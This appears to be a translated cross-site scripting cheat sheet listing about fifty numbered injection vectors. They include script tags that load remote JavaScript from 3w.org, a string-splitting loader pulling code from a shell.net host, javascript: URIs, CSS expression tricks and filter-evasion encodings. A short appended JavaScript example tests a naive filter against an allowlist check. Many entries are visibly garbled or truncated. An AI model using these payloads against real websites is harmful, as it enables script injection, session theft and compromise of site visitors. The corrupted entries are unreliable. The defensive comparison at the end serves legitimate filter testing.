(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative pop-up vectors
<q/oncut=alert()>
<s/onclick=alert()>
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript directive
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (charcode calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>
(11) Embedded tab, splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection, an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null bytes are basically ineffective in China, since there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=\'#\'" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes, or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping the JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT SRC=\'#\'" /span>

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC=\'#\'" /span>

(35) IMG LOWSRC
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) list-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC=\'#\'" /IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression_r(alert('XSS'))">

(50) Anonymous STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>
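Items (3) to (14), (17) and (19) above all defeat the same defence: a filter that looks for the literal string javascript: in the raw attribute value. The added example below is mine, not part of the cheat sheet; the function names (isSafeUrlAttribute and friends) and the sample inputs are my own, and it assumes the check runs on an attribute value server-side before that value is written into a page. It runs the naive filter and a normalize-then-allowlist check against one constructed input per obfuscation from the list.

```javascript
// Added example, not from the cheat sheet. Naive filter: a case-sensitive
// substring match on the raw attribute value, as a first attempt often does.
function naiveBlocksJavascriptUrl(value) {
  return value.includes("javascript:");
}

// Decode numeric HTML entities as a browser does inside an attribute value,
// with or without the trailing semicolon; out-of-range code points become "".
function decodeNumericEntities(value) {
  const cp = (n) => (n <= 0x10ffff ? String.fromCodePoint(n) : "");
  return value
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => cp(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => cp(parseInt(d, 10)));
}

// Browsers drop ASCII control characters (tab, LF, CR, NUL) and surrounding
// whitespace before reading the scheme, so the check normalizes the same way.
function normalizeUrlValue(value) {
  return decodeNumericEntities(value)
    .replace(/[\u0000-\u001f\u007f]/g, "")
    .trim()
    .toLowerCase();
}

// Scheme allowlist; a scheme-less (relative) URL is accepted as well.
const ALLOWED_SCHEMES = new Set(["http", "https", "mailto"]);
function isSafeUrlAttribute(value) {
  const m = normalizeUrlValue(value).match(/^([a-z][a-z0-9+.-]*):/);
  return m === null || ALLOWED_SCHEMES.has(m[1]);
}

// One constructed input per obfuscation listed on the page.
const SAMPLE_VECTORS = [
  "javascript:alert('XSS')",       // (3) plain
  "JaVaScRiPt:alert('XSS')",       // (4) mixed case
  "&#106;avascript:alert('XSS')",  // (5) decimal entity with semicolon
  "&#106avascript:alert('XSS')",   // (9) decimal entity without semicolon
  "&#x6A;avascript:alert('XSS')",  // (10) hex entity
  "jav\tascript:alert('XSS')",     // (11) embedded tab
  "jav\nascript:alert('XSS')",     // (13) embedded newline
  "jav\rascript:alert('XSS')",     // (14) embedded carriage return
  "java\0script:alert('XSS')",     // (17) null byte
  "  javascript:alert('XSS')",     // (19) leading spaces
];

// Per vector: did the naive filter reject it, did the allowlist check reject it?
function evaluateFilters(vectors) {
  return vectors.map((v) => ({
    naiveCaught: naiveBlocksJavascriptUrl(v),
    allowlistCaught: !isSafeUrlAttribute(v),
  }));
}
```

The naive filter rejects only the two inputs that contain the exact lowercase string; the allowlist check rejects all ten while still accepting http, https, mailto and relative URLs.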